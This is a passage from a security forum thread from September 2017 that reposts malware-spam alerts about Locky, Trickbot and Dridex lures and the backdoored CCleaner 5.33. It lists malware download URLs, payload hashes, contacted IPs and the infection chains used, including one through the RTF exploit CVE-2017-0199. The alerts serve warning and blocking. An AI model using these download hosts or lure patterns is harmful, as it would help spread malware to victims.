7 Sep 2017 - "... Locky downloader... an email with the subject of 'FreeFax From:1707075536' (random numbers) pretending to come from fax@ freefaxtoemail .net...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/FreeFax-From-1707075536.png
Fax_Message_7932180645.js - Current Virus total detections 12/59*. Payload Security** downloads from
http ://universodeljuguete .com/eusukll.exe (VirusTotal 15/65[3]) (Payload Security[4])...
This current series of downloaders have links-in-the-body of the email to numerous different -compromised- websites. This particular one went to
http ://coopstella .net/fax.html where there is an -iframe- that downloads the js file from
http ://leypart .su/fax.php where a randomly numbered Fax_Message_####.js file is created and downloaded...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/39dfdcdfc991828b3044492a42d6049b63d9caf96162412f7dbf92031f9d135d/analysis/1504782496/
Fax_Message_7932180645.js
** https://www.hybrid-analysis.com/sample/39dfdcdfc991828b3044492a42d6049b63d9caf96162412f7dbf92031f9d135d?environmentId=100
Contacted Hosts
94.127.190.141
62.109.12.221
47.88.55.29
98.124.251.75
98.124.252.66
3] https://www.virustotal.com/en/file/e9981527fade0266ec18c73bf3cb066738ed12c3c3530a30a2e56a790d180107/analysis/1504784148/
eusukll.exe
4] https://www.hybrid-analysis.com/sample/e9981527fade0266ec18c73bf3cb066738ed12c3c3530a30a2e56a790d180107?environmentId=100
universodeljuguete .com: 94.127.190.141: https://www.virustotal.com/en/ip-address/94.127.190.141/information/
coopstella .net: 185.58.7.72: https://www.virustotal.com/en/ip-address/185.58.7.72/information/
leypart .su: > https://check-host.net/check-dns?host=leypart.su - ??
:fear::fear: :mad:
AplusWebMaster
2017-09-12, 16:17
FYI...
Fake 'Amazon' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-your-amazon-co-uk-order-has-been-dispatched-tries-to-deliver-malware/
12 Sep 2017 - "... coming from the Necurs botnet is an email with the subject of 'Your Amazon.co.uk order 172-3041149-3373628 has been dispatched' (random numbers) pretending to come from Amazon .co.uk <auto-shipping@ amazon .co.uk>...
UPDATE: found download site and it is Trickbot again...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Your-Amazon.co_.uk-order-172-3041149-3373628-has-been-dispatched-email.png
The fake Amazon website looks like this. The Sign In button does go to a genuine Amazon .co.uk sign in page:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/paranda_uz_amazon_downloader-_site.png
Update: ... 'found a download location
http ://storiteller .com/3f3geuf.exe (VirusTotal 11/59*) (Payload Security**)... 'not certain if actually running the .js file will deliver the payload or whether the malware devs have messed up.
Further update: I am also being told about some versions downloading Locky via
http ://ruisi .fr/ddokslf.exe (VirusTotal 10/65[3]) (Payload Security[4])... 'really difficult to work out the payloads, when the .js files are created on the fly... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/3b704063e484540747c121899bde2b4e68776795084b4f70b9a360f7e7b2ba95/analysis/1505211474/
ORDER-467-3587106-1645978.js
** https://www.hybrid-analysis.com/sample/3b704063e484540747c121899bde2b4e68776795084b4f70b9a360f7e7b2ba95?environmentId=100
Contacted Hosts
82.80.201.25
47.88.55.29
3] https://www.virustotal.com/en/file/81314c3e33ec0bcb5e4850a1835aa3914ff1e7d9ee3f5e4ed5c29016b67e660a/analysis/1505213071/
3f3geuf.exe
4] https://www.hybrid-analysis.com/sample/81314c3e33ec0bcb5e4850a1835aa3914ff1e7d9ee3f5e4ed5c29016b67e660a?environmentId=100
storiteller .com: 82.80.201.25: https://www.virustotal.com/en/ip-address/82.80.201.25/information/
> https://www.virustotal.com/en/url/630e4fd681837b81b89207a0ee3bef122d0bf2c49d09c448cf08990b5dc3c80a/analysis/
ruisi .fr: 195.154.227.5: https://www.virustotal.com/en/ip-address/195.154.227.5/information/
> https://www.virustotal.com/en/url/e1dbc08f200ba47dd854186d1b4bab73cb12734d0b4ce2c20671f6e779fe26e9/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-09-14, 14:02
FYI...
Fake 'Invoice' SPAM - Necurs botnet delivers malware
- https://myonlinesecurity.co.uk/more-necurs-botnet-sent-fake-invoices-deliver-malware/
14 Sep 2017 - "... sent from the Necurs botnet is a typical generic spam email with the subject of 'Copy of Invoice 487391' (random numbers) pretending to come from Customer Service <service@ randomdomain .tld>. There is -no- attachment with these today, just a link-in-the-email body to a variety of -compromised- sites. The link will always go to <site name>/invoice .html which uses an -iframe- to download a random numbered invoice.js from
http ://wittinhohemmo .net/invoice.php (this site has been used in this malware campaign for at least 1 week now). The js file is different to the ones we have been seeing so far this week, they are much smaller (about 5kb) and using trivially obfuscated reverse strings to “hide” the download sites...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Copy-of-Invoice-487391.png
Sites I found are:
http ://multila .com/HJGFjhece3.exe
http ://vereouvir .pt/HJGFjhece3.exe
They use email addresses and subjects that will entice a user to read the email and follow the link.
Invoice-671398.js - Current Virus total detections 9/58*. Payload Security**
HJGFjhece3.exe (VirusTotal 10/63[3]) (Payload Security[4]). I cannot work out if this is Trickbot or Locky today so far. The behaviour so far seen doesn’t exactly match either malware. It might be damaged or not working properly or some sort of anti-sandbox /VM protection to it. My gut feeling is -Trickbot- based on similar behaviour over the last few days when run in a sandbox or VM... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ae8d73230c0c51ac61d5107bc08608c4a8ff9624dc1af809bc44118dff24b10c/analysis/1505376478/
Invoice-290134.js
** https://www.hybrid-analysis.com/sample/ae8d73230c0c51ac61d5107bc08608c4a8ff9624dc1af809bc44118dff24b10c?environmentId=100
Contacted Hosts
203.74.203.14
47.89.254.1
80.172.241.21
3] https://www.virustotal.com/en/file/183ee9cb06b2d7bbaa785dd140a2c3b9558db7adefd70c2a8b06e05bee8e1e76/analysis/1505377027/
2193.exe
4] https://www.hybrid-analysis.com/sample/183ee9cb06b2d7bbaa785dd140a2c3b9558db7adefd70c2a8b06e05bee8e1e76?environmentId=100
wittinhohemmo .net: 47.89.254.1: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
> https://www.virustotal.com/en/url/2453d6fc6d140bd7651af4d33eef2050f52b792e8d26c5c33bf8aedfb2a4a393/analysis/
multila .com: 203.74.203.14: https://www.virustotal.com/en/ip-address/203.74.203.14/information/
> https://www.virustotal.com/en/url/32213a5473dd719533bcc09c17a86fc7b0ecdfec172daf4056e92bd9d659fdbf/analysis/
vereouvir .pt: 80.172.241.21: https://www.virustotal.com/en/ip-address/80.172.241.21/information/
> https://www.virustotal.com/en/url/7a19008d3e0391ac0c3bc3ba7c3069d0fb7a024b44c1925fe4cd13f2cd2285de/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-09-18, 14:22
FYI...
CCleaner 5.33 compromised...
- https://www.helpnetsecurity.com/2017/09/18/hackers-backdoored-ccleaner/
Sep 18, 2017 - "... Piriform – the company that develops CCleaner and which has been recently acquired by AV maker Avast – has confirmed* that the 32-bit version of the v5.33.6162 of CCleaner and the v1.07.3191 of CCleaner Cloud were affected..."
Security Notification for CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 for 32-bit Windows users
* https://www.piriform.com/news/release-announcements/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users
Sep 18, 2017 - "We recently determined that older versions of our Piriform CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 had-been-compromised. We resolved this quickly and believe no harm was done to any of our users. This compromise only affected customers with the 32-bit version of the v5.33.6162 of CCleaner and the v1.07.3191 of CCleaner Cloud. No other Piriform or CCleaner products were affected. We encourage all users of the 32-bit version of CCleaner v5.33.6162 to download v5.34 here: download**. We apologize and are taking extra measures to ensure this does not happen again..."
** https://www.piriform.com/ccleaner/download/standard
- http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
Sep 18, 2017 - "... Talos recently observed a case where the download servers used by software vendor to distribute a legitimate software package were leveraged to deliver malware to unsuspecting victims. For a period of time, the legitimate signed version of CCleaner 5.33 being distributed by Avast also contained a multi-stage malware payload that rode-on-top of the installation of CCleaner... Given the potential damage that could be caused by a network of infected computers even a tiny fraction of this size we decided to move quickly. On September 13, 2017 Cisco Talos immediately notified Avast of our findings so that they could initiate appropriate response activities..."
Indicators of Compromise (IOCs):
... IP Addresses
216[.]126[.]225[.]148 "
216.126.225.148: https://www.virustotal.com/en/url/add324c56011c4297f0eb88a2bd77715c6abee55b3cb300b4654d30956a5d3a8/analysis/
___
Fake 'Revised invoice' SPAM - delivers malware
- https://myonlinesecurity.co.uk/re-revised-invoice-malspam-tries-to-delivers-malware-using-an-r24-extension/
18 Sep 2017 - "... an email with the subject of 'Re: Revised invoice' pretending to come from Sales <Sales@ machinery .com>... it comes with an .r24 extension which is completely unknown to windows. Examining the file in a hex editor shows it has a PK header which means it is a compressed (zip) file. Simply renaming the extension to .zip will allow the contents to be extracted and examined...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/re-revised-invoice.png
New Invoice.r24 (VirusTotal 9/62*): Extracts to: New Invoice.com - Current Virus total detections 15/65**
Payload Security***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f39befc0d91916c60b70f35f3fa08a2070a8f9257f32a9f147da57149adac96b/analysis/1505723811/
New Invoice.r24
** https://www.virustotal.com/en/file/9fe67d131e40b4685d61b3f7463f07b11e030c9f7af9f956f3d6cd740d00ecb3/analysis/1505723863/
New Invoice.com
*** https://www.hybrid-analysis.com/sample/9fe67d131e40b4685d61b3f7463f07b11e030c9f7af9f956f3d6cd740d00ecb3?environmentId=100
___
Fake 'Status of invoice' SPAM - leads to Locky
- http://blog.dynamoo.com/2017/09/malware-spam-status-of-invoice-with-7z.html
18 Sep 2017 - "This spam leads to Locky ransomware:
Subject: Status of invoice
From: "Rosella Setter" ordering@ [redacted]
Date: Mon, September 18, 2017 9:30 am
Hello,
Could you please let me know the status of the attached invoice? I
appreciate your help!
Best regards,
Rosella Setter
Tel: 206-575-8068 x 100
Fax: 206-575-8094
*NEW* Ordering@[redacted].com
* Kindly note we will be closed Monday in observance of Labor Day *
The name of the sender varies. Attached is a .7z archive file with a name similar to A2174744-06.7z which contains in turn a malicious .vbs script with a random number for a filename... Automated analysis of those two samples [1] [2] [3] [4] show this is Locky ransomware. Those two scripts attempt to download a component from:
yildizmakina74 .com/87thiuh3gfDGS?
miliaraic .ru/p66/87thiuh3gfDGS?
lanzensberger .de/87thiuh3gfDGS?
web-ch-team .ch/87thiuh3gfDGS?
abelfaria .pt/87thiuh3gfDGS?
An executable is dropped with a detection rate of 19/64[5] which Hybrid Analysis[6] shows is phoning home to:
91.191.184.158 /imageload.cgi (Monte Telecom, Estonia)
195.123.218.226 /imageload.cgi (Layer 6, Bulgaria)
.7z files are popular with the bad guys pushing -Locky- at the moment. Blocking them at your mail perimiter may help.
Recommended blocklist:
195.123.218.226
91.191.184.158 "
1] https://www.hybrid-analysis.com/sample/24888615662135054bb9a28d50ae2c0f6711975ba5251f0862ecc8b95b2512de?environmentId=100
Contacted Hosts
85.95.237.29
195.123.218.226
91.191.184.158
2] https://www.hybrid-analysis.com/sample/0faf7bb76b212bafe2949ed9c0d04c87a5aea40deefb11d360fb6912be84fbd8?environmentId=100
Contacted Hosts
194.150.248.56
91.191.184.158
195.123.218.226
3] https://malwr.com/analysis/Y2IxOTMwMjY3OGUyNGVjYmI4ODNiNzZjNjJjMmViYzQ/
5121669985.vbs
4] https://malwr.com/analysis/MGY4YzRmOWE2YTIxNDY3ZWE4NjZjYWE5NGJjZDA1ZmM/
25860394240.vbs
5] https://www.virustotal.com/en/file/c674da5f1c063a0bec896d03492620ac94687e7687a1b91944d93c1d6527c8a7/analysis/
CJgBjTI.exe
6] https://www.hybrid-analysis.com/sample/c674da5f1c063a0bec896d03492620ac94687e7687a1b91944d93c1d6527c8a7?environmentId=100
Contacted Hosts
91.191.184.158
195.123.218.226
216.58.209.228
85.95.237.29: https://www.virustotal.com/en/ip-address/85.95.237.29/information/
195.123.218.226: https://www.virustotal.com/en/ip-address/195.123.218.226/information/
91.191.184.158: https://www.virustotal.com/en/ip-address/91.191.184.158/information/
:fear::fear: :mad:
AplusWebMaster
2017-09-19, 20:51
FYI...
Fake 'Order' SPAM - delivers Locky ykcol
- https://myonlinesecurity.co.uk/fake-herbalife-order-number-invoice-malspam-delivers-locky-ykcol/
19 Sep 2017 - "... Locky downloader... an email with the subject of 'HERBALIFE Order Number: 6N01000137' (random numbers) pretending to come from Herbalife <svc_apacnts_8169@ herbalife .com> (random numbers as well). Today’s version continues to use the 'ykcol' extension for encrypted files...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/HERBALIFE-Order-Number-6N01000137.png
6N01000137_1.7z: Extracts to: 6N01005710.vbs - Current Virus total detections 16/55*. Payload Security**
| downloads an encrypted txt file which is converted by the script to vtifOYBP.exe (VirusTotal 30/64***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/794dcfdcc1362140eee6fcda11ddf239ab048a965bba634bb787321db9672cfa/analysis/1480616575/
-6dt874p53077.js
** https://www.hybrid-analysis.com/sample/dd4268c405dc83d5c3d171d26ceb76021a1b0b8aa94f98b6f883e63ef19f0814?environmentId=100
DNS Requests
isiquest1 .com - 178.33.107.201 - OVH, SAS - France
Contacted Hosts
178.33.107.201: https://www.virustotal.com/en/ip-address/178.33.107.201/information/
> https://www.virustotal.com/en/url/64d7292d120e024848d760be4deac362d84c482d7af5aca97b9dbb6a92fa3c34/analysis/
*** https://www.virustotal.com/en/file/d1b8b8c6cce9175c844875a68b61e50107cd7b5d5c6ac2ec76dbb3b06ed727f8/analysis/
JGHldb03m
:fear::fear: :mad:
AplusWebMaster
2017-09-20, 13:10
FYI...
Fake 'invoice' SPAM - delivering Locky
- https://myonlinesecurity.co.uk/more-random-company-fake-invoices-delivering-locky-ransomware-again-today/
20 Sep 2017 - "... Locky downloaders... an email with the subject of 'Status of invoice A2178050-11' (random numbers) pretending to come from random names with a from address of ordering@ random companies. The subjects all start with 'Status of invoice A217' with 4 extra digits, then 2 digits...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Status-of-invoice-A2178050-11.png
A2178050-11.rar: Extracts to: 20080920_757068.vbs - Current Virus total detections*. Payload Security**.
Downloads
http ://mariamandrioli .com/RSkfsNR7? which is an executable file....
Frequently these are encrypted -txt- files that need converting to the .exe (VirusTotal 16/65[3])
Payload Security[4]). Other download sites for the malware binary include:
http ://ryterorrephat .info/af/RSkfsNR7
http ://hard-grooves .com/RSkfsNR7?
Other sites and a -different- locky binary - details have been posted by Racco42[5]on pastebin[6]...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/794dcfdcc1362140eee6fcda11ddf239ab048a965bba634bb787321db9672cfa/analysis/1480616575/
-6dt874p53077.js
** https://www.hybrid-analysis.com/sample/0fbb399652c30e51c3c338380dd3a87e944496d64f5d9da56525e30880051ff2?environmentId=100
Contacted Hosts
108.59.87.148
3] https://www.virustotal.com/en/file/614bfea6b81f56b59bd0f2222b65b57571796245a7886a8e31be8a3ccd0e5617/analysis/1505896879/
RSkfsNR7.exe
4] https://www.hybrid-analysis.com/sample/614bfea6b81f56b59bd0f2222b65b57571796245a7886a8e31be8a3ccd0e5617?environmentId=100
5] https://twitter.com/Racco42/status/910423167092629504
6] https://pastebin.com/F5K6BKQX
mariamandrioli .com: 108.59.87.148: https://www.virustotal.com/en/ip-address/108.59.87.148/information/
> https://www.virustotal.com/en/url/d81cd4f457f0d9243d020c1953b51cdf51d333d4e65d58aa2176b704f633fdcd/analysis/
ryterorrephat .info: 54.187.116.55: https://www.virustotal.com/en/ip-address/54.187.116.55/information/
> https://www.virustotal.com/en/url/a25aac71207de2546eb594eaf8b9b9bb812342a3112fc8f014eca1dc9c63b343/analysis/
hard-grooves .com: 54.187.116.55: https://www.virustotal.com/en/ip-address/54.187.116.55/information/
:fear::fear: :mad:
AplusWebMaster
2017-09-21, 13:07
FYI...
Fake 'Amazon Invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-amazon-marketplace-invoice-malspam-delivers-locky-ransomware/
21 Sep 2017 - "... Locky downloaders... an email with the subject of 'Invoice RE-2017-09-21-00102' (random last 6 digits) pretending to come from Amazon Marketplace <uJLHsSYOYmvOX@ marketplace.amazon .co.uk> (random characters before the @)...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Amazon-Marketplace-Spam-email-with-Locky-downloader.png
RE-2017-09-21-00102.7z: Extracts to: RE-2017-09-21-00273.vbs - Current Virus total detections 14/58*:
Payload Security** | Downloads
http ://accuflowfloors .com/IUGiwe8? which is a txt file that is -renamed- to nVtcNP.exe (VirusTotal 22/63***)
Other download sites inside this VBS file are:
fulcar .info/p66/IUGiwe8 and
afradem .com/IUGiwe8? - There will be dozens of others in other versions...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a0485d80d244dba619691fb4f39fc36ba3323616733e48b63d61af1cd0894906/analysis/1505983662/
** https://www.hybrid-analysis.com/sample/a0485d80d244dba619691fb4f39fc36ba3323616733e48b63d61af1cd0894906?environmentId=100
Contacted Hosts
65.182.174.12
*** https://www.virustotal.com/en/file/ac6da4890150e2037a5913623557ab759b62d0ee9206ec0bacac318523afbc53/analysis/1505984851/
TnipmOahC.exe
accuflowfloors .com: 65.182.174.12: https://www.virustotal.com/en/ip-address/65.182.174.12/information/
> https://www.virustotal.com/en/url/6564afeaf197a64e7f6142340a9197afbe8fdcbb177c890ce6fcd459a38c8c18/analysis/
fulcar .info: https://check-host.net/check-dns?host=fulcar.info
[ http://blog.dynamoo.com/2017/09/malware-spam-invoice-re-2017-09-21.html
21 Sep 2017
Comment: ... This will be the Necurs botnet. IPs will be all over the place... blocking .7z files would probably not cause much a problem, these are commonly used for Locky right at the moment. ]
afradem .com: 178.255.99.134: https://www.virustotal.com/en/ip-address/178.255.99.134/information/
___
'CCleaner' Command and Control - follow up ...
- http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html
Sep 20, 2017 - "Talos recently published a technical analysis of a backdoor which was included with version 5.33 of the CCleaner application*. During our investigation we were provided an archive containing files that were stored on the C2 server. Initially, we had concerns about the legitimacy of the files. However, we were able to quickly verify that the files were very likely genuine based upon the web server configuration files and the fact that our research activity was reflected in the contents of the MySQL database included in the archived files. In analyzing the delivery code from the C2 server, what immediately stands out is a list of organizations, including Cisco, that were specifically targeted through delivery of a second-stage loader. Based on a review of the C2 tracking database, which only covers four days in September, we can confirm that at least 20 victim machines were served specialized -secondary- payloads...
* http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
... These new findings raise our level of concern about these events, as elements of our research point towards a possible unknown, sophisticated actor. These findings also support and reinforce our previous recommendation that those impacted by this supply chain attack should not simply remove the affected version of CCleaner or update to the latest version, but should restore from -backups- or -reimage- systems to ensure that they completely remove not only the backdoored version of CCleaner but -also- any other malware that may be resident on the system...
Conclusion: Supply chain attacks seem to be increasing in velocity and complexity. It's imperative that as security companies we take these attacks seriously. Unfortunately, security events that are not completely understood are often downplayed in severity. This can work counter to a victim's best interests. Security companies need to be conservative with their advice before all of the details of the attack have been determined to help users ensure that they remain protected. This is especially true in situations where entire stages of an attack go undetected for a long period of time. When advanced adversaries are in play, this is especially true. They have been known to craft attacks that avoid detection by specific companies through successful reconnaissance techniques. In this particular example, a fairly sophisticated attacker designed a system which appears to specifically target technology companies by using a supply chain attack to compromise a vast number of victims, persistently, in hopes to land some payloads on computers at very specific target networks..."
(More detail at the talosintelligence URL above.)
- https://www.helpnetsecurity.com/2017/09/21/ccleaner-compromise-targets/
Sep 21, 2017
>> https://www.helpnetsecurity.com/tag/ccleaner/
- https://blog.avast.com/progress-on-ccleaner-investigation
Sep 21, 2017
> https://www.askwoody.com/2017/is-your-ccleaner-safe-new-evidence-suggests-maybe-not/
Sep 21, 2017
> https://www.ghacks.net/2017/09/21/ccleaner-malware-second-payload-discovered/
Sep 21, 2017
:fear::fear: :mad:
AplusWebMaster
2017-09-22, 13:07
FYI...
Fake 'Forskolin' SPAM - using spoofed email addresses
- https://myonlinesecurity.co.uk/another-forskolin-spam-email-campaign-using-spoofed-email-addresses/
22 Sep 2017 - "... malspam campaign again today pushing the crappy, scummy, useless 'Forskolin weight loss' junk... Some subjects in the original emails include (there are hundreds of variants): These pretend to be Facebook notifications about missed private messages or pending notifications:
You photos that will be deleted in 1 days
You have notification that will be removed in 5 hours
For You new message that will be removed in 6 days
Private message that will be deleted in 3 hours
You friend that will be deleted in 5 hours
You have notification that will be deleted in 7 days
The Hotmail emails look like:
- https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/hotmail_dmarc_rejects_email.png
The original emails look like these:
- https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/support_3.png
- https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/support_2.png
- https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/support_1.png
The links go to a multitude of -compromised- sites but all eventually end today on
http ://weight4forlossdiet-4tmz .world/en/caus/forskolin/?bhu=8mczFswKd5ZrUCttf15dChmqRGCWobCch
(with a different random reference number) where you see a page looking like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2016/04/weightloss-scam.png
This shows the importance of having correct authentication set up on your email server with DMARC* reporting, so you know when your email address is being spoofed and used in a mass malspam campaign:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/hotmail_dmarc_rejects2.png
* https://myonlinesecurity.co.uk/another-compromised-tech-support-company-server-sending-spam-why-you-should-use-dmarc/ "
weight4forlossdiet-4tmz .world: 192.254.79.249: https://www.virustotal.com/en/ip-address/192.254.79.249/information/
> https://www.virustotal.com/en/url/5b444bf588807977cb9f3dae5c2293df7644563529b750e59b62fa35fc96ec06/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-09-24, 12:41
FYI...
Fake 'BL copy' SPAM - RTF exploit delivers malware
- https://myonlinesecurity.co.uk/fwd-bl-copy-malspam-uses-rtf-exploit-cve-2017-0199-to-deliver-malware/
24 Sep 2017 - "An email with the subject of 'Fwd: BL copy' coming from pedro.estaba@ cindu .com.ve with a malicious word doc attachment delivers malware using the RTF exploit CVE-2017-0199. The word doc is actually a RTF doc. It is highly likely that recipients will get a similar email with different senders and email body content, imitating various innocent companies. These download -multiple- different malwares.
> https://nvd.nist.gov/vuln/detail/CVE-2017-0199
Last Modified: 04/12/2017
CVSS v2 Base Score: 9.3 HIGH
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/BL-copy.png
The CVE-2017-0199 exploit was plugged in all supported versions of Microsoft Office back in April 2017, with additional fixes in subsequent Security updates including September 2017. If you have not applied the patches, then simply opening or even just -previewing- these word docs in your email client or windows explorer might be enough to infect you...
export.doc - Current Virus total detections 24/59[1]. Payload Security[2]. Both Payload Security and manual analysis shows a download of an HTA file from
http ://birsekermasali .com/hta/docs.hta (VirusTotal 15/59[3]) (Payload Security[4]) which contains encoded / encrypted commands to download
http ://birsekermasali .com/js/boss/payment.exe which is giving a 404.
I decided to dig around a bit on the open directories on birsekermasali .com and see what I could find. Trying
http ://birsekermasali .com/js/boss/ gave me a password required prompt, but trying the
http ://birsekermasali .com/hta/ gave me -2- additional -HTA- files:
allfiles.hta (VirusTotal 6/58[5]) (Payload Security[6]) which downloads
http ://birsekermasali .com/js/boss/invoices.exe (VirusTotal 38/65[7]) (Payload Security[8])
kelly.hta (VirusTotal 14/59[9]) (Payload Security[10]) Which downloads
http ://birsekermasali .com/js/kels/docs.exe (VirusTotal 46/65[11]) (Payload Security[12]) which in turn downloads
http ://birsekermasali .com/js/kels/dates.exe (VirusTotal 41/59[13]) (Payload Security[14])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustotal.com/en/file/8e41225b75e0fc583b3618e867c5c4773eb79becc9b29068adc4893f74938258/analysis/1506187514/
2] https://www.hybrid-analysis.com/sample/8e41225b75e0fc583b3618e867c5c4773eb79becc9b29068adc4893f74938258?environmentId=100
Contacted Hosts
192.185.115.14
3] https://www.virustotal.com/en/file/73c4ee5d324f937607e2c5485a232ea14f088998dee5a8c31f7cf97d16840782/analysis/1506231952/
docs[1].hta
4] https://www.hybrid-analysis.com/sample/17ef7dea9cdf5036627394a3cbdd6a68ee0588aa02718a15c915c5d4760e461c?environmentId=100
Contacted Hosts
192.185.115.14
74.125.206.106
162.221.190.147
209.9.53.57
69.172.201.153
198.54.116.113
213.167.231.2
112.175.232.227
23.227.38.64
121.127.250.125
5] https://www.virustotal.com/en/file/17ef7dea9cdf5036627394a3cbdd6a68ee0588aa02718a15c915c5d4760e461c/analysis/1506234023/
allfiles.hta
6] https://www.hybrid-analysis.com/sample/17ef7dea9cdf5036627394a3cbdd6a68ee0588aa02718a15c915c5d4760e461c?environmentId=100
Contacted Hosts
192.185.115.14
74.125.206.106
162.221.190.147
209.9.53.57
69.172.201.153
198.54.116.113
213.167.231.2
112.175.232.227
23.227.38.64
121.127.250.125
7] https://www.virustotal.com/en/file/6f7685c862c9eb127ea70dd6dc0c4739fc3b98d81786c0835c08445eb48eef96/analysis/1506170974/
8] https://www.hybrid-analysis.com/sample/6f7685c862c9eb127ea70dd6dc0c4739fc3b98d81786c0835c08445eb48eef96?environmentId=100
9] https://www.virustotal.com/en/file/fc0d03d59151fb7b34cb0ce08490a48a9aa549e22f13f39ef1b003c4f98e6b38/analysis/1506234037/
kelly.hta
10] https://www.hybrid-analysis.com/sample/fc0d03d59151fb7b34cb0ce08490a48a9aa549e22f13f39ef1b003c4f98e6b38?environmentId=100
Contacted Hosts
192.185.115.14
198.54.115.96
11] https://www.virustotal.com/en/file/f1701c839f7a5bd8d8f54697fab611fa8a14c21fed3827ac74c124ac272a0ec3/analysis/1506035556/
output.112274294.txt
12] https://www.hybrid-analysis.com/sample/f1701c839f7a5bd8d8f54697fab611fa8a14c21fed3827ac74c124ac272a0ec3?environmentId=100
13] https://www.virustotal.com/en/file/2b6cd663fd179ec614546830af7866e6e2f7e20a0af349d2916dce027743aa4c/analysis/1506118256/
14] https://www.hybrid-analysis.com/sample/2b6cd663fd179ec614546830af7866e6e2f7e20a0af349d2916dce027743aa4c?environmentId=100
birsekermasali .com: 192.185.115.14: https://www.virustotal.com/en/ip-address/192.185.115.14/information/
> https://www.virustotal.com/en/url/c08a3b21b11d89f65be0fee13decc6e904ca44e39f9e6936a1a22a86ece003a3/analysis/
> https://www.virustotal.com/en/url/da45099dd81fe853e0a0a3a4bee84a2d43719560433979e3440594aabdee7cbc/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-09-25, 12:59
FYI...
Fake 'Voice Message' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-broadviewnet-net-voice-message-malspam-delivers-locky-ransomware/
25 Sep 2017 - "... Locky ransomware.... They are sticking with 'Voice Message' theme again today. It is an email with the subject of 'Message from 02031136950' (random phone number) pretending to come from server@ random number.um .broadviewnet .net. They all come from 'Message Server' and the email address is server@ random number.um .broadviewnet .net...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Message-from-02031136950.png
Voice Message(02031136950.7z: Extracts to: Voice Message(02090039814).vbs - Current Virus total detections 10/58*. Payload Security**. These -vbs- files download from a large number of -compromised- sites. This example contacts
asheardontheradiogreens .com/YTkjdJH7w1
tertrodefordown .info/af/YTkjdJH7w1
artplast .uz/YTkjdJH7w1?
where a txt file is downloaded. The file is a actually a renamed.exe file (VirusTotal 17/65***). With these if there is a ? at the end of a URL, you get a renamed.txt file. If there is no ? you get an .exe that has no extension... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e81576a55b527f4ae4abcf461ced2c3a7c92455af6138e26e257736bb99fda1f/analysis/1506322168/
Voice Message(02090039814).vbs
** https://www.hybrid-analysis.com/sample/e81576a55b527f4ae4abcf461ced2c3a7c92455af6138e26e257736bb99fda1f?environmentId=100
199.30.241.139
*** https://www.virustotal.com/en/file/b86a830769fcfd54201495353c5ab8931f7ca796ef54a2219a04b9e7cb7d2a7a/analysis/1506322258/
YTkjdJH7w1.txt
asheardontheradiogreens .com: 199.30.241.139: https://www.virustotal.com/en/ip-address/199.30.241.139/information/
> https://www.virustotal.com/en/url/cd130592c4710f1414156fdcb9fa9bb2452f11a94a0cc30baa6a31d847c205d7/analysis/
tertrodefordown .info: 49.51.36.73: https://www.virustotal.com/en/ip-address/49.51.36.73/information/
> https://www.virustotal.com/en/url/fa623e722c5e0502a7983d2776dd321cd2677d218a20e7a5d201206f8d4b0c52/analysis/
artplast .uz: 62.209.133.18: https://www.virustotal.com/en/ip-address/62.209.133.18/information/
> https://www.virustotal.com/en/url/2e951305a5269d89c21230322a37178c10db173b806fa0a98d32f360bfdaf65d/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-09-26, 15:39
FYI...
Fake 'eFax and Virgin Media' SPAM - deliver Dridex
- https://myonlinesecurity.co.uk/dridex-banking-trojan-delivered-via-fake-emails-from-efax-and-virgin-media/
26 Sep 2017 - "... Dridex Banking Trojans being delivered via malspam emails... The 2 that I have looked at so far are:
'Your Virgin Media bill is ready' coming from Virgin Media <webteam@ virginmedia.smebusinesslink .com>'
'Corporate eFax message' from “Unknown” – 4 page(s), Caller-ID: 44-161-261-1924 coming from eFax Corporate <message@ efax.inboundcop .com>
... the criminals sending these have registered look-a-like or plausible domains: they are actually using subdomains of these domains that make a recipient think that the emails are coming from a “proper” message sending service... The emails are just about identical to those on these 2 pages with the dates and amounts changed:
